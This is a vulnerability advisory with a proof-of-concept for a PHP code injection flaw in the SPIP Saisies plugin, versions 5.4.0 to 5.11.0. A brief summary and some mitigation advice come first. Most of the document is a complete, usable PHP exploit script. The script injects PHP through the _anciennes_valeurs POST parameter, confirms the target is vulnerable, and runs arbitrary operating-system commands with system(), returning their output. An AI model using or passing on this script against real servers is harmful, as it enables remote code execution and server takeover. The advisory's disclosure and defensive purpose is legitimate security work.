=============================================================================================================================================
| # Title     : SPIP Saisies Plugin 5.4.0-5.11..PHP Code Injection Security Analysis and Risk Overview                                      |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
| # Vendor    : https://www.spip.net/en_rubrique25.html                                                                                     |
=============================================================================================================================================

[+] Summary    :  A critical PHP code injection vulnerability has been identified in the Saisies plugin for SPIP.
                  The issue affects versions 5.4.0 through 5.11.0 and stems from improper sanitization of user-controlled input in the _anciennes_valeurs parameter. 
				  When improperly handled inside template rendering logic, attacker-supplied input may be interpreted as executable PHP code.

If successfully exploited, this vulnerability could lead to:

Remote Code Execution (RCE)

Arbitrary command execution

Data disclosure

Server compromise (depending on privileges)

Security teams should:

Upgrade to the latest patched version immediately

Review template rendering logic for unsafe input handling

Enforce strict input validation and output encoding

Monitor logs for anomalous POST requests targeting the affected parameter

Consider deploying a Web Application Firewall (WAF)

The vulnerability highlights the importance of secure template rendering and strict separation between user input and executable code.

[+] POC   : 

<?php

$options = getopt("u:c:p:", ["url:", "cmd:", "param:"]);

$target_url = $options['u'] ?? ($options['url'] ?? null);
$command    = $options['c'] ?? ($options['cmd'] ?? null);
$param_name = $options['p'] ?? ($options['param'] ?? '_anciennes_valeurs');

if (!$target_url) {
    die("Usage: php exploit.php -u <url> [-c <command>] [-p <parameter>]\nExample: php exploit.php -u http://site.com/spip.php?page=contact -c 'id'\n");
}

function send_request($url, $post_data) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_TIMEOUT, 20);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; Win64; x64)");
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    return ['body' => $response, 'code' => $http_code];
}

function execute_php($url, $param, $php_code) {
    $start_marker = substr(md5(rand()), 0, 8);
    $end_marker   = substr(md5(rand()), 0, 8);
    $wrapped = "echo '{$start_marker}'; {$php_code}; echo '{$end_marker}';";
    $injection = "x' ?><?php {$wrapped} ?><input value='x";
    $response = send_request($url, [$param => $injection]);

    if (!$response['body']) return null;

    $pattern = "/" . preg_quote($start_marker) . "(.*?)" . preg_quote($end_marker) . "/s";
    if (preg_match($pattern, $response['body'], $matches)) {
        return trim($matches[1]);
    }

    return null;
}

echo "[*] Targeting: $target_url\n";
echo "[*] Parameter: $param_name\n";

$test_marker = "VULN_CHECK_" . rand(100, 999);
$check_result = execute_php($target_url, $param_name, "echo '{$test_marker}';");

if ($check_result && strpos($check_result, $test_marker) !== false) {
    echo "[+] Target is Vulnerable!\n";
} else {
    echo "[-] Target does not seem vulnerable or parameter is incorrect.\n";
    exit(1);
}

if ($command) {
    echo "[*] Executing command: $command\n";
    // Use base64 to avoid special character issues in commands
    $cmd_payload = "system(base64_decode('" . base64_encode($command) . "'));";
    $output = execute_php($target_url, $param_name, $cmd_payload);
    
    if ($output) {
        echo "[+] Result:\n$output\n";
    } else {
        echo "[-] Command executed but returned no output.\n";
    }
} else {
    echo "[!] No command specified. Use -c to execute an OS command.\n";
}
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================